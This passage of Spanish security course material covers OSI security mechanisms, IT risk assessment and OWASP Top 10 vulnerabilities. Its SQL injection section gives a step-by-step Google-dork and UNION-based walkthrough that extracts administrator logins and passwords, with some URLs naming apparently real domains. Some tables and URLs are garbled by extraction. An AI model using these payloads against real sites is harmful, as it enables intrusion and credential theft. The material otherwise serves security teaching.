correspondiente para proporcionar algunos de los servicios de seguridad OSI. Dentro de
este tipo de mecanismos se definen los siguientes tipos:
• Cifrado: procedimiento mediante el cual, haciendo uso de un algoritmo,

se transforma un mensaje de tal forma que sea incomprensible para
toda persona que no sepa la clave de cifrado y el algoritmo usado.
• Firma digital: método criptográfico que asocia la identidad de una
entidad a un mensaje y que permite al receptor verificar la identidad de
la fuente y la integridad del mensaje.
• Mecanismo de control de acceso: permite realizar una separación de

privilegios individual para cada entidad que pueda acceder a un sistema
o información.
• Mecanismo de integridad de datos: mecanismo empleado para verificar
la integridad los mensajes intercambiados en una comunicación entre
entidades.
• Mecanismo de intercambio de autentificación: mecanismo diseñado
para verificar la identidad de una entidad a través de un intercambio de
información.
• Mecanismo de relleno de tráfico: mecanismo que permite proteger el
tráfico frente a su posible análisis.
• Mecanismo de control de enrutamiento: mecanismo que permite
la selección de rutas seguras para el envío de determinados datos,
principalmente si se detectan agujeros de seguridad.
• Mecanismo de notarización: mecanismo de registro de datos por una
tercera parte confiable que da fe de la veracidad de estos.
MECANISMOS GENERALES DE SEGURIDAD
Estos mecanismos no son específicos de ninguna capa de protocolo o sistema de

seguridad OSI específico.
• Funcionalidad fiable: procedimientos que se utilizan para complementar

la seguridad proporcionada por otros mecanismos.
• Etiquetas de seguridad: los recursos del sistema pueden tener
asociadas etiquetas de seguridad que indican su nivel de sensibilidad.
• Detección de eventos: detección de todo tipo de eventos ocurridos en el
sistema, tanto violaciones de seguridad como accesos satisfactorios.
• Informe para auditoría de seguridad: recopilación de datos que
permiten la revisión de los registros y actividades del sistema para
verificar el cumplimiento de las políticas de seguridad establecidas, con
el fin de proporcionar eficientemente seguridad al sistema. Además, en
caso de encontrar algún incumplimiento, se recomiendan los cambios
necesarios para solucionarla.
• Recuperación segura: después de algún fallo en la seguridad de un
sistema, se deben llevar a cabo acciones de recuperación mediante la
aplicación de varias medidas establecidas previamente, como resultado
de ciertas pruebas de verificación de criterios y normas.
RELACIÓN ENTRE SERVICIOS Y MECANISMOS DE SEGURIDAD

Para terminar con la exposición de los servicios y los mecanismos de seguridad, en la
siguiente tabla podemos ver una relación en los servicios de seguridad descritos y los
mecanismos de seguridad existentes. Esto es, qué mecanismos de seguridad se pueden
utilizar para dotar a una comunicación de los servicios de seguridad necesarios.

ATAQUE
CONTROL INTEGRIDAD RELLENO

FIRMA INTERCAMBIO DE CONTROL DEL
SERVICIO CIFRADO DE DE LOS DEL NOTARIZACIÓN
DIGITAL AUENTIFICACIÓN ENRUTAMIENTO
ACCESO DATOS TRÁFICO
AUTENTICACIÓN
DE LAS ENTIDADES X X X
ORIGEN/DESTINO
AUTENTICACIÓN
DEL ORIGEN DE LOS X
DATOS
CONTROL DE
ACCESO X
CONFIDENCIALIDAD X X
CONFIDENCIALIDAD
DEL FLUJO DE X X X X
TRÁFICO
INTEGRIDAD DE LOS
DATOS X X X
NO REPUDIO X X
DISPONIBILIDAD X X
6.5. Modelos de seguridad en redes.

Cuando dos entidades necesitan establecer una comunicación se establece un canal
de información, que define una ruta a través de la red que va desde el emisor al receptor.
Los interlocutores procederán a realizar el intercambio de mensajes haciendo uso de los
protocolos de comunicación TCP/IP sobre el canal establecido.
Para proteger la transmisión de información a través de este canal de posibles atacantes
se pueden utilizar diversas técnicas que proporcionen la seguridad que sea necesaria
(que variará en función del escenario concreto). Estas técnicas se basan, principalmente,
en dos componentes:
• Una transformación sobre el mensaje que se va a enviar (cifrado, firma
digital, etc.).
• Información secreta compartida por las entidades y desconocida por el
atacante.
Además, algunas veces para conseguir una transmisión segura es necesaria una tercera
parte confiable que distribuya la información secreta a las entidades implicadas en la
comunicación y que ejerza de árbitro para verificar su identidad. Todos estos elementos
pueden observarse en la Figura 10.
En general, de cara al diseño de un mecanismo de seguridad como el que se comenta,
hay cuatro tareas básicas que deben llevarse a cabo:
• Diseño del algoritmo que realizará la transformación sobre el mensaje.
• Generación de la información secreta que usará el algoritmo para
transformar el mensaje.
• Desarrollo de métodos que permitan la distribución de la información
secreta.
• Especificación del protocolo que permita a las entidades hacer uso

del algoritmo y la información secreta para obtener un servicio de
seguridad.
Además de proteger la transmisión de información a través de un canal de comunicaciones,
deben protegerse también los extremos que han establecido este canal; ya que existen
otros tipos de ataque consistentes en introducir un software que explote debilidades
de estos sistemas y que afecten a su funcionamiento. Más concretamente, este tipo de
ataques suelen derivarse de dos clases de amenazas:
• Amenazas de acceso a la información: captura o alteración de datos

por una entidad no autorizada.
• Amenazas al servicio: aprovechamiento de un exploit del sistema con el
fin de impedir su uso a entidades legítimas.
De cara a hacer frente a este tipo de ataques, existen dos categorías de mecanismos de
seguridad que permiten hacer frente a accesos no deseados:
• Vigilancia: uso de software que permita detectar y rechazar software

malicioso (malware).
Monitorización: uso de software que permita la detección de intrusos en el sistema.
6.6. Evaluación de riesgos de las Tecnologías de la

Información
EVALUACIÓN DE RIESGOS DE TECNOLOGÍAS DE LA INFORMACIÓN

Según la norma ISO 31000, la evaluación del riesgo es un proceso global compuesto de
tres procesos: identificación del riesgo, análisis del riesgo y valoración del riesgo.
Este proceso de evaluación del riesgo se debe realizar de forma sistemática, iterativa y
colaborativa con base en el conocimiento y los puntos de vista aportados por las partes
interesadas, cuya participación es imprescindible en este proceso, en el que se debe utilizar
la mejor información disponible, la cual debe ser complementada por investigaciones y
fuentes adicionales, en el caso de que fuese necesario.
IDENTIFICACIÓN DE RIESGOS DE TI
La identificación del riesgo de TI es el proceso que tiene por objeto detectar, identificar y
registrar los riesgos a los que está expuesta la información y los sistemas de información
y comunicaciones de la organización.
Si consideramos el riesgo como el efecto sobre los objetivos de la incertidumbre existente
y tenemos en cuenta que el efecto supone una desviación sobre los previstos y que dicho

efecto puede ser positivo o negativo, o incluso tener los dos compontes, estamos hablando
de que la existencia del riesgo supone la existencia de oportunidades o de amenazas
para la organización. En nuestro caso solo vamos a tratar los riesgos que supongan un
efecto negativo de cara a la consecución de los objetivos de la organización, vamos a
tratar de riesgos que tengan origen en la materialización de amenazas.
La finalidad de la identificación del riesgo esidentificar los eventos, las materializaciones
de amenazas o las situaciones que pudiesen ocurrir y originar un impacto que
comprometiese el cumplimiento de los objetivos del sistema o de la organización.
El proceso de identificación del riesgo incluye la identificación de las causas y del origen
de las amenazas, eventos, situaciones o circunstancias que pudiesen tener un impacto
sobre los objetivos de la organización y la magnitud y naturaleza de dicho impacto.
Para identificar los riesgos, se pueden utilizar:
• Métodos basados en evidencias, como listas de verificación y revisiones

de datos históricos.
• Enfoques sistemáticos. Un grupo de expertos utiliza un proceso
sistemático para identificar riesgos por medio de un conjunto
estructurado de proposiciones o preguntas.
• Técnicas de razonamiento inductivo.
Adicionalmente, se pueden utilizar técnicas de apoyo, como pueden ser la tormenta de

ideas y el método Delphi, para mejorar la precisión y la exhaustividad de la identificación
del riesgo.
Independientemente de las técnicas actuales que se empleen a la hora de identificar
el riesgo, es imprescindible que en el proceso de identificación del riesgo se tengan en
cuenta los factores humanos y culturales y el propio contexto, tanto interno como
externo, de la organización.
En función del grado de conocimiento de la existencia de un posible riesgo, este se
clasifica en:
• Conocido-Conocido: el riesgo es perfectamente conocido.

• Conocido-Desconocido: el riesgo se desconoce, pero se sabe que podría
existir.
• Desconocido-Desconocido: se desconoce todo, incluso la posible
existencia del riesgo.
A la hora de identificar los riesgos es necesario tener en cuenta la existencia de riesgos

desconocidos.
El valor del riesgo es función de la probabilidad de ocurrencia de un evento, de una
materialización de una amenaza, y del impacto que supone dicha materialización sobre
el cumplimiento de los objetivos.
La probabilidad de materialización de una amenaza depende de:

• El origen de la amenaza.
• El atacante, en caso de que sea intencionada.
• Las características de la organización: del sistema de información, del
activo, del elemento que sea objeto del ataque y de las vulnerabilidades
que tenga.
En el caso de un sistema de información, una vulnerabilidad es una debilidad o fallo que

permite o facilita que un atacante pueda comprometer la integridad, disponibilidad o
confidencialidad de la información que procesa, almacena o transmite dicho sistema de
información.
Podemos decir, que las amenazas se materializan aprovechando las oportunidades que
brindan las vulnerabilidades, cuando más vulnerable sea un sistema más probable es
que una amenaza se materialice, que un atacante tenga éxito.
El impacto es la consecuencia de un evento, la materialización de una amenaza que

compromete la integridad, disponibilidad o confidencialidad de la información que
procesa, almacena o transmite un sistema de información y que, por lo tanto, afecta de
manera negativa a los objetivos de la organización.
El valor del impacto se debe cuantificar y se puede expresar de forma cualitativa o
cuantitativa, teniendo en cuenta que el impacto puede incrementarse por la acumulación
de eventos o por efectos en cascada.
Una amenaza emergente es una amenaza nueva o una amenaza ya existente de la
que se ha detectado un incremento del número de materializaciones o cambios en sus
características que hacen que aumente el impacto.
Un riesgo se considera emergente cuando la amenaza que lo origina es una amenaza
emergente.
El riesgo aumenta cuando:
• El número de amenazas que lo originan aumenta.

• La probabilidad de materialización de la amenaza aumenta.
• El impacto de la materialización de la amenaza aumenta.
Es necesario tratar los riesgos de TI como riesgos emergentes.

Se debe identificar los riesgos emergentes, para ello es necesario establecer un proceso
específico que se desarrolla por medio de las siguientes actividades:

• Recopilación de datos.
• Análisis de los datos.
• Intercambio de información.
La recopilación de datos debe ser realizada con el mayor número posible de fuentes: de
la literatura científica, de los medios de comunicación, de la información proporcionada
por los órganos reguladores, de los datos de negocio, de la vigilancia y supervisión de las
redes y sistemas y de la opinión de expertos (miembros de paneles, redes de contactos,
grupos de interés...).
Los datos obtenidos deben ser filtrados y analizados para detectar señales e indicios de
posibles nuevos riesgos.
Por último, el intercambio de información con otras organizaciones y partes interesadas es
imprescindible para una detección temprana de los riesgos emergentes y una respuesta
eficaz a los mismos.
A la hora de identificar los riesgos, entre otras, se pueden utilizar las siguientes técnicas:
• Tormenta de ideas.
• Entrevistas estructuradas o semiestructuradas.
• Delphi.
• Listas de verificación.
• Análisis preliminar de peligros.
• Estudios de peligros y de operatividad (HAZOP).
• Análisis de peligros y puntos de control críticos (HACCP).
• Apreciación de riesgos ambientales.
• Estructura «y si...» (SWIFT).
• Análisis de escenarios.
• Análisis de los modos de fallo y de los efectos.
• Análisis de causa-y-efecto.
• Análisis de fiabilidad humana.
• Mantenimiento centrado en la fiabilidad.
• Matriz de consecuencia/probabilidad.

ANÁLISIS DE RIESGOS EN TI
El proceso de análisis de riesgos en TI tiene por objeto alcanzar una comprensión de los
riesgos en las tecnologías de la información, lo que nos va a proporcionar elementos de
entrada tanto para el proceso de valoración del riesgo, y para la toma de decisiones en
relación con la necesidad de tratamiento de los riesgos, así como de las estrategias y los
métodos de tratamiento del riesgo más apropiados.
El proceso de análisis de riesgos en TI consiste en determinar y evaluar sus consecuencias,
determinando la probabilidad de ocurrencia de los sucesos de riesgo, materializaciones
de amenazas y otros eventos que hayan sido identificados, teniendo en cuenta tanto la
presencia o no de los controles, medidas de seguridad, actualmente implantados, así
como su eficacia y grado de madurez.
En función de las consecuencias, del impacto y de la probabilidad de ocurrencia se
determina el nivel de riesgo.
A la hora de realizar un análisis de riesgos hay que identificar, considerar y tener en
cuenta las causas y las fuentes del riesgo, sus orígenes, las amenazas, los actores, las
circunstancias y factores que influyen en la magnitud de las consecuencias, del impacto
y la probabilidad de materialización de este. Teniendo en cuenta siempre, que un suceso,
una materialización de una amenaza, puede tener múltiples consecuencias y puede
afectar a múltiples activos.
A la hora de analizar los riesgos se deben calcular dos valores de riesgo: el primero sin
tener en cuenta los controles, las medidas de seguridad, las salvaguardas, actualmente
implantados, y el segundo teniéndolos en cuenta, valorando su eficacia y grado de
madurez. Lo que nos va a proporcionar dos valores del riesgo:
• Riesgo inherente, también denominado riesgo potencial, el riesgo al que se

está expuesto sin tener en cuenta los controles implantados: función (Impacto,
vulnerabilidad, probabilidad).
• Riesgo real, el riesgo al que se está expuesto teniendo en cuenta la eficacia
y madurez de los controles implantados: función (Impacto, vulnerabilidad,
probabilidad, controles).
Cuando se realiza un análisis de riesgos en TI hay que llevar a cabo una estimación
de toda la gama de los posibles impactos que se podrían derivar de un evento, de la
materialización de una amenaza, así como de las probabilidades de ocurrencia tanto
del evento como de cada uno de los posibles impactos. Sin embargo, en algunas
circunstancias, podemos estimar probabilidades muy bajas, lo que nos podría llevar a
desestimar algunos riesgos por insignificantes, aunque su impacto fuese alto. En estos
casos debería tener mayor peso el impacto que la probabilidad en el cálculo del valor del
riesgo y en la toma de decisiones asociada al tratamiento de estos riesgos insignificantes.
En ocasiones, una consecuencia o un impacto puede ser el resultado de diferentes
eventos, de diferentes circunstancias, de diferentes materializaciones de amenazas o
de un suceso no identificado. En este caso, de indeterminación del origen, a la hora de
analizar los riesgos en TI hay que centrarse en analizar la criticidad y la vulnerabilidad
de los activos, de los componentes del sistema, para, con base en ellos,estimar el valor

del riesgo y para poder tomar decisiones respecto al tratamientos del riesgo necesarios,
los niveles de protección y las estrategias de recuperación.
Para analizar los riegos en TI se pueden utilizar métodos cualitativos, semicuantitativos,
o cuantitativos. El grado de detalle del análisis va a depender del caso particular, de
la disponibilidad de datos fiables y de las necesidades de toma de decisiones de la
organización. En algunos casos, la legislación aplicable establece el método y el grado
de detalle del análisis de riesgos que se deben utilizar a la hora de analizar los riesgos de
determinados sistemas de información.
La apreciación cualitativa define las consecuencias, la probabilidad y el nivel de riesgo,
indicando niveles tales como «alto», «medio» y «bajo», o como «muy alto», «alto», «medio»,
«bajo» y «muy bajo», y combina las consecuencias y la probabilidad para evaluar el nivel
de riesgo resultante en función de criterios cualitativos, utilizando habitualmente tablas
para realizar la estimación.
A continuación, se muestra un ejemplo de tabla para el cálculo del riesgo con una
apreciación cualitativa.
Tabla 1. Cálculo del riesgo con una apreciación cualitativa. Fuente: elaboración propia.
Tabla 10. Cálculo del riesgo con una apreciación cualitativa
Los métodos de análisis de riesgos semicuantitativos utilizan escalas de valoración

numéricas para las consecuencias y la probabilidad y las combinan para determinar un
nivel de riesgo aplicando una función matemática. Las escalas pueden ser tanto lineales
como logarítmicas o tener cualquier otro tipo de relación. y las funciones que también
pueden ser muy diferentes. Pero siempre intentar definir criterios objetivos a la hora de
efectuar una valoración, como ejemplo se incluyen tres tablas de valoración de impacto,
una por cada dimensión de la seguridad de la información: integridad, disponibilidad y
confidencialidad.
A continuación, se muestra un ejemplo de tabla para el cálculo del riesgo con una
apreciación semicuantitativa.

Tabla 11Cálculo del riesgo con una apreciación cuantitativa
Para realizar un análisis cuantitativo es necesario estimar valores reales para las
consecuencias y sus probabilidades, para poder obtener valores del nivel de riesgo en
unidades específicas, generalmente económicas, que se deben establecer al inicio del
proceso de gestión del riesgo en el momento en el que establece el contexto.
En ocasiones no es posible o deseable realizar un análisis cuantitativo completo ya sea
debido a que no se dispone de suficiente información acerca del sistema o actividad
que se está analizando. Esto puede ser debido, tanto a que no está garantizado que se
pueda obtener un resultado válido del análisis cuantitativo como a la falta de datos, a
la influencia de factores humanos u otro tipo de factores. En este caso, puede ser más
efectiva una valoración semicuantitativa o cualitativa de los riesgos llevada a cabo por
personas con conocimientos específicos de los riesgos y activos objeto del análisis.
Cuando se utilicen métodos de análisis cualitativos o semicuantitativos, al inicio del
proceso de gestión del riesgo, en el momento en el que establece el contexto del proceso
de gestión del se deben establecer y registrar las bases y criterios utilizados para la

valoración, y definir con claridad todos los términos que se vayan a emplear durante el
análisis.
En cualquier caso, incluso cuando se haya aplicado un método cuantitativo de análisis
durante todo el proceso de gestión de riesgos, es necesario ser conscientes de que todos
los niveles de riesgo calculados son estimativos.
A la hora de informar el resultado del análisis de riesgos es necesario determinar y dejar
constancia del nivel de exactitud y precisión de los valores de riesgo calculado, teniendo
en cuenta que estos valores deben ser coherentes con la precisión de los datos y métodos
empleados a la hora de efectuar el análisis.
A la hora de analizar los riesgos, entre otras, se pueden utilizar las siguientes técnicas:
• Estudios de peligros y de operatividad (HAZOP).

• Análisis de peligros y puntos de control críticos (HACCP).
• Apreciación de riesgos ambientales.
• Estructura «y si...» (SWIFT).
• Análisis de escenario.
• Análisis del impacto económico.
• Análisis de la causa primordial.
• Análisis de los modos de fallo y de los efectos.
• Análisis del árbol de fallos.
• Análisis del árbol de sucesos.
• Análisis de causa y consecuencia.
• Análisis de causa y efecto
• Análisis de capas de protección (LOPA).
• Diagrama de decisiones.
• Análisis de fiabilidad humana.
• Análisis de pajarita.
• Mantenimiento centrado en la fiabilidad.
• Análisis de Markov.
• Redes Bayesianas.
• Curvas FN.
• Índices de riesgo.
• Matriz de consecuencia y probabilidad.
• Análisis de costes y beneficios.

• Análisis de decisión multicriterio (MCDA).
Los niveles de riesgo se deben definir, calcular y comunicar en los términos más adecuados
para cada tipo de riesgo en cuestión, en un lenguaje entendible por el negocio, de forma
que sea una ayuda efectiva a hora de la toma de decisiones. Una forma de hacerlo es
establecer la magnitud de un riesgo como una distribución de probabilidad sobre un
conjunto de impactos.
A continuación, podemos ver un gráfico donde se representan el riesgo como una

distribución de probabilidad e impacto.
Ilustración 42. Distribución de probabilidad e impacto de los niveles de riesgo

7. Detección y análisis de
vulnerabilidades
7.1. OWASP Top ten
A1: 2021: VIOLACIÓN DEL CONTROL DE ACCESO

Algunas de las principales vulnerabilidades que caen en esta categoría son las
siguientes:
Tabla 12 Principales vulnerabilidades de A1: 2021.
Estas vulnerabilidades pueden posibilitar el acceso de usuarios no autorizados a recursos

del servidor de aplicaciones o gestor de bases de datos. Con una aplicación vulnerable
a Path traversal, un atacante puede hacer uso de esta vulnerabilidad para salirse
del directorio raíz y acceder a otras partes del sistema de archivos. Esto podría dar al
atacante la posibilidad de acceder a archivos restringidos, lo que podría proporcionarle
otra información necesaria para comprometer aún más el sistema.
La petición de la Figura 2 hará que la página dinámica recupere el archivo system.ini
del sistema de archivos y se lo muestre al usuario. La expresión «../» instruye al sistema
a subir un directorio que se usa comúnmente como directiva del sistema operativo. El
atacante tiene que adivinar cuántos directorios tiene que subir para encontrar la carpeta
de Windows en el sistema, pero esto se hace fácilmente por ensayo y error. El acceso al
recurso puede ser mediante rutas relativas (CWE 23) o absolutas (CWE 36).

Ilustración 43. Relative path traversal
Para defenderse de esta vulnerabilidad, en primer lugar, hay que asegurarse de tener
instalada la última versión del software en el servidor web y de que se hayan aplicado
todos los parches.
En segundo lugar, validar de forma efectiva cualquier entrada de usuario. Lo ideal sería
eliminar todo (p.e...//), menos los datos buenos conocidos, y validar los metacarácteres
de la entrada del usuario. Esto asegurará que solo será enviado al servidor lo que se
introduzca en el campo.
A2:2021: DEBILIDADES CRIPTOGRÁFICAS

Algunas de las principales vulnerabilidades que caen en esta categoría son las
siguientes:
Tabla 13. Principales vulnerabilidades de A2: 2021
Estas vulnerabilidades con la revelación de información sensible de cualquier capa de

la aplicación, usuarios, direcciones IP, tecnologías, etc., a través de mensajes de error,
comentarios, datos en texto plano en consultas. La cadena de consulta se puede
guardar en el historial del navegador, pasar por enlaces o referencias a otros sitios web,
almacenarse en registros web o registrarse de otra forma en otras fuentes.
Si la cadena de consulta contiene información sensible, como los identificadores de sesión,
los atacantes pueden utilizar esta información para lanzar nuevos ataques (CWE 598).
Una fuga de información interna se produce cuando los datos del sistema o información

de depuración se envían a un archivo local, a una consola o a una pantalla mediante
impresión o registro (CWE 497).
Ejemplo de la información de error de la pila.
Try
{...} catch(Exception e) {e.printStackTrace();}
La información que mostrar a los usuarios debe filtrarse para no incluir aquella que sea
sensible y pueda beneficiar a un atacante.
A3:2021: INYECCIÓN
Algunas de las principales vulnerabilidades que caen en esta categoría son:
Tabla 14. Principales vulnerabilidades de A3:2021: inyección
Tabla 3. Principales vulnerabilidades de A3:2021: inyección. Fuente: elaboración propia.
XSS CWE 79
Se pueden dar varios tipos de XSS: reflejado, persistente y basado en DOM
(Document Object Model):
XSS reflejado (o no persistente)

El servidor lee los datos directamente de la petición HTTP y los refleja en la respuesta HTTP.
Los exploits XSS reflejados ocurren cuando un atacante hace que la víctima suministre
contenido peligroso a una aplicación web vulnerable, que luego es reflejado de nuevo a
la víctima y ejecutado por el navegador web.
El mecanismo más común para la entrega de contenido malicioso es incluirlo como
parámetro en una URL que se publica o se envía por correo electrónico directamente a
la víctima. Los URL construidos de esta manera constituyen el núcleo de muchos planes
de suplantación de identidad, mediante los cuales un atacante convence a la víctima
de visitar un URL que remite a un sitio vulnerable. Una vez que el sitio refleja el contenido
del atacante de vuelta a la víctima, dicho contenido es ejecutado por el navegador de la
víctima.
Ilustración 44. Ejemplo 1. CWE 79-XSS
Ilustración 45. Ejemplo 2. CWE 79–XSS.
XSS almacenado (o persistente)

La aplicación almacena datos peligrosos en una base de datos, un foro de mensajes, un

registro de visitantes u otro almacén de datos de confianza. Posteriormente, los datos
peligrosos se vuelven a leer en la aplicación y se incluyen en el contenido dinámico. Este
código funciona correctamente cuando los valores de nombre se comportan bien. Puede
parecer menos peligroso porque el valor del nombre se lee de una base de datos cuyo
contenido es aparentemente gestionado por la aplicación.
Sin embargo, si el valor del nombre se origina a partir de datos suministrados por el
usuario, entonces la base de datos puede ser un medio para alojar contenido malicioso.
Sin una validación adecuada de la entrada de todos los datos almacenados en la base
de datos, un atacante puede ejecutar comandos maliciosos en el navegador web del
usuario.
Ilustración 46. Ejemplo 3. CWE 79 – XSS persistente
XSS Dasado en DOM

DOM XSS son las siglas de Document Object Model-based Cross-site Scripting.
Un ataque XSS basado en DOM es posible si la aplicación web escribe datos en el modelo
de objeto de documento sin la debida sanitización. El atacante puede manipular estos
datos para incluir el contenido XSS en la página web, por ejemplo, código JavaScript
malicioso.
El DOM es una convención utilizada para representar y trabajar con objetos en un
documento HTML (así como en otros tipos de documentos). Todos aquellos que sean
HTML tienen un DOM asociado que consiste en objetos que representan las propiedades
del documento desde el punto de vista del navegador.
Cuando se ejecuta un script del lado del cliente, puede utilizar el DOM de la página
HTML donde se ejecuta el script. Este puede acceder a varias propiedades de la página
y cambiar sus valores. Un atacante puede usar varios objetos DOM para crear un
ataque de Cross-site Scripting. Los objetos más populares desde esta perspectiva son
document.url, document location, y document referrer. Las consecuencias potenciales
de las vulnerabilidades XSS basadas en DOM están clasificadas como moderadas en el
documento OWASP Top 10 2017.
A continuación, se presenta un ejemplo básico de una vulnerabilidad de Cross-site
Scripting basada en DOM. La página de ejemplo se personaliza en base al nombre de
usuario, que se codifica en la URL y se usa directamente en la página resultante:

Ilustración 47. Ejemplo 4. CWE 79 – XSS DOM
Por ejemplo:
http://www.example.com/userdashboard.html?context=Mary es un
tablero personalizado para Mary. Contiene la cadena del tablero
principal para Mary en la parte superior. Así es como se puede realizar
un ataque XSS basado en DOM para esta aplicación web:
El atacante incrusta un script malicioso en la URL: http://www.
example.com/userdashboard.html#context=<script>SomeF
unction(somevariable)</script>.
El navegador de la víctima recibe esta URL, envía una petición HTTP a
http://www.example.com y recibe la página HTML estática.
El navegador comienza a construir el DOM de la página y llena la
propiedad document.URL con la URL del paso 1.
El navegador analiza la página HTML, alcanza el script y lo ejecuta,
extrayendo el contenido malicioso de la propiedad document.URL.
El navegador actualiza el cuerpo HTML en bruto de
la página a contener: Dashboard principal para
<script>SomeFunction(somevariable)</script>.
El navegador encuentra el código JavaScript en el cuerpo HTML y lo
ejecuta.
SQL INJECTION CWE 89
Mediante la inyección SQL un atacante podría realizar entre otras cosas las siguientes
acciones contra el sistema:
• Permitir a un usuario modificar consultas y acceder a registros u objetos
de la base de datos a los que inicialmente no tenía acceso por su nivel de
privilegios o por no tener cuenta de usuario para acceder al sistema.
• Elevación de privilegios: todos los sistemas de autenticación que utilicen
credenciales almacenadas en gestores de bases de datos hacen que una
vulnerabilidad de inyección SQL pueda permitir a un atacante acceder a los

identificadores de usuarios privilegiados y cambiar las credenciales.
• Denegación de servicio: la modificación de comandos SQL puede llevar a la
ejecución de acciones destructivas como el borrado de datos, objetos o la
parada de servicios con comandos de parada y arranque de los sistemas.
Además, se pueden inyectar comandos que generen un alto cómputo en
el motor de base de datos que haga que el servicio no les responda a los
usuarios legales en tiempos útiles.
• Suplantación de usuarios: al poder acceder al sistema de credenciales es
posible que un atacante obtenga las credenciales de otro usuario y realice
acciones con la identidad de otro usuario robada o spoofeada.
• En sentencias SQL, donde se combinan palabras clave con datos, se puede
alterar las estructuras de control malintencionadamente y, por tanto, el
significado de la sentencia. La intención era solamente suministrar datos a la
sentencia sin alterar las estructuras de control (Figura 8).
Ilustración 48. Ejemplo de ataque SQLI. Fuente: adaptada de 9lessons.blogspot.com
Un atacante explota este tipo de vulnerabilidades especificando metacarácteres que

tienen un significado especial, como simples comillas (‘), dos puntos (..), peligroso en
sistema de ficheros. Para los comandos de Shell, el punto y coma (;) y la doble et (&&)
también son peligrosos, así como el carácter de nueva línea (/n) para los ficheros de
log. En el ejemplo de la Figura 8 se muestra este tipo de vulnerabilidad en una sentencia
SQL que se forma concatenando strings de tal forma que se deja abierta a un ataque
conocido como inyección de SQL.

Ilustración 49. Ejemplo de bug que deja abierto el código a un ataque de inyección de SQL. Fuente: Chess y
west, 2007.
El programador que escribió el código pretendía formar consultas

como la del ejemplo a continuación:
SELECT * FROM ítems WHERE owner = <userName> AND itemname
= <itemName>;
Pero un atacante puede asignar al campo itemname la cadena
«name' OR 'a'='a» con lo que la sentencia
se convierte en:
SELECT * FROM items WHERE owner = 'wiley' AND itemname
= 'name' OR 'a'='a';
La adición de OR 'a'='a' convierte la
sentencia pretendida a esta: SELECT * FROM ítems Esta sentencia
extrae todas las filas de la tabla ítems y el atacante las puede
visualizar. Este es un pequeño ejemplo de lo que un atacante puede
hacer y muestra que se podrían también borrar todos los datos de la
tabla y ejecutar muchas más sentencias distintas de la pretendida
que solo mostrar una fila al usuario.
La forma de ayudar a prevenir este tipo de ataques es utilizar consultas parametrizadas

que fuerzan la distinción entre estructuras de control, como son las palabras clave de
una sentencia SQL de lo que son puramente datos de entrada por parte del usuario de la
aplicación. Los programadores pueden explícitamente especificar a la base de datos, lo
que debe ser tratado como comando y lo que debe ser tratado como datos (Figura 9).
Ilustración 50 Ejemplo de consulta SQL construida con el uso de sentencias parametrizadas. Fuente: Chess y
west, 2007.

Se puede probar en los campos de entrada con metacarácteres y la sentencia UNION que
requiere exactitud en el número de campos y tipos de datos para determinar el tipo de
base de datos entre otros. Se debe ir aumentando el número de campos sucesivamente.
Los dorks son palabras claves que se usan para encontrar sitios vulnerables.
Un ejemplo de dork sería el siguiente:
noticia.php?id=
En Google se puede buscar: inurl: noticia.php?id= a continuación se
prueba cualquier sitio web que utiliza ese inurl:
http://sitio.com/noticias.php?id=-1+UNION+SELECT+1,2¬
http://sitio.com/noticias.php?id=-1+UNION+SELECT+1,2,3¬
http://sitio.com/noticias.php?id=-1+UNION+SELECT+1,2,3,4¬
Y así sucesivamente añadiendo campos hasta que el error

desaparezca.
En este caso se llega hasta el número seis, pero hay ocasiones en las que puede superar
los setenta. Cuando el error ya no esté se volverá a mostrar la página y, curiosamente,
contendrá uno o más números en el banner de la web. Esos números son relativos a
tablas y se puede afirmar que la web es vulnerable a SQLi. Seguidamente se debe elegir
uno de los números, se puede seleccionar el cinco, por ejemplo, (o usar cualquiera) para
que me muestre los nombres de las tablas en su lugar. Lo que sigue ahora es agregar,
después del último número de la url, el siguiente código:
+from+information_schema.tables— (Mysql) y reemplazar el número
5 (que fue el número que apareció en el cuerpo de la página) por
table_name.
h t t p : / / s i t i o . c o m / n o t i c i a s . p h p ? i d = -
1+UNION+SELECT+1,2,3,4,tablename,6+from+information_schema.
table s¬
Aparece el nombre de tabla «character_sets». Lo que se debe hacer ahora es agregar,

después de information_schema.tables, lo siguiente:
+limit+2,1— para ir avanzando en los nombres de tablas hasta
llegar a tablas que puedan comprometer la seguridad, de
usuarios, p.e. sitio.administradores. http://www.sitio.com/
noticias.php?id=- id=-
1+UNION+SELECT+1,2,3,4,%2520tablename,6+from+informati
on_shem a.tables-limit-3,1% 25E2%2580%2594
1+UNION+SELECT+1,2,3,4,%2520tablename,6+from+information_
schem a.tables+limit+3,1%25E2%2580%2594

Se convierte el nombre de tabla a ascii: 115 105 116 105 111 95 97 100 109 105 110 105 115 116 114
97 100 111 114 101 115 y se ejecuta:
http://www.semgaragon.es/web/noticias/noticia.
php?id=- 1+UNION+SELECT+1,2,3,4,group_concat(column_
name),6+from+informa tion_schema.columns+where+table_name
=char(115,105,116,105,111,95,9 7,100,109,105,110,105,115,116,114,97,100,111,114,101,115
)%E2%80%9 4
Se obtiene la composición de las columnas de la tabla:
idAdmin, login, activo, password, nombre
Las que sirven son las columnas de login y password, así que ahora se reemplazan en la
inyección lo siguiente:
group_concat(column_name) por concat(Login,0x3a, Password)
Concat significa concatenar, algo similar que unir. Y el 0x3a son dos
puntos. Esto es para que el usuario y la contraseña no aparezcan
juntas, sino que los separe los dos puntos. Teniendo como resultado
algo así:
Usuario: contraseña.
Se borra desde information_schema.columns en adelante y se deja

+from+, después de ese from, se coloca el nombre de la tabla, que en nuestro caso se
llamaba: sitio_administradores, quedando lo siguiente:
http://www.samg.es/web/noticias/noticia.php?id=-
1+UNION+SELECT+1,2,3,4,
concat(Login,0x3a,Password),6+from+sitio_administradores—
• Algunas de las funciones MYSQL más interesantes son:

• Version(): muestra la versión de la base de datos.
• Database(): el nombre de la base de datos a la que se está conectado.
• User(), system_user(), session_user(), current_user().
• Nombres de distintos usuarios.
• Last_insert_id(): id de la última inserción.
• Connection_id(): id de la conexión actual.
•

INJECCIÓN SQL A CIEGAS
Un tipo de SQLI es la denominada Injección SQL a ciegas (blind SQLI). Consiste en probar
las entradas de datos interaccionando con la base de datos e interpretar los resultados
cuando estos no den error para determinar si se ha obtenido éxito o no:
http://example.com/ex.php?id=25 AND 1=1
¿Se obtiene la misma página? Sí: parece que inyección ejecutada (true).
http://example.com/ex.php?id=25 AND 1=0
¿Se obtiene otra página? Sí: es vulnerable (false).

Si la página nunca cambia es posible que todavía pueda ser vulnerable.
SQLI BASADA EN TIEMPO

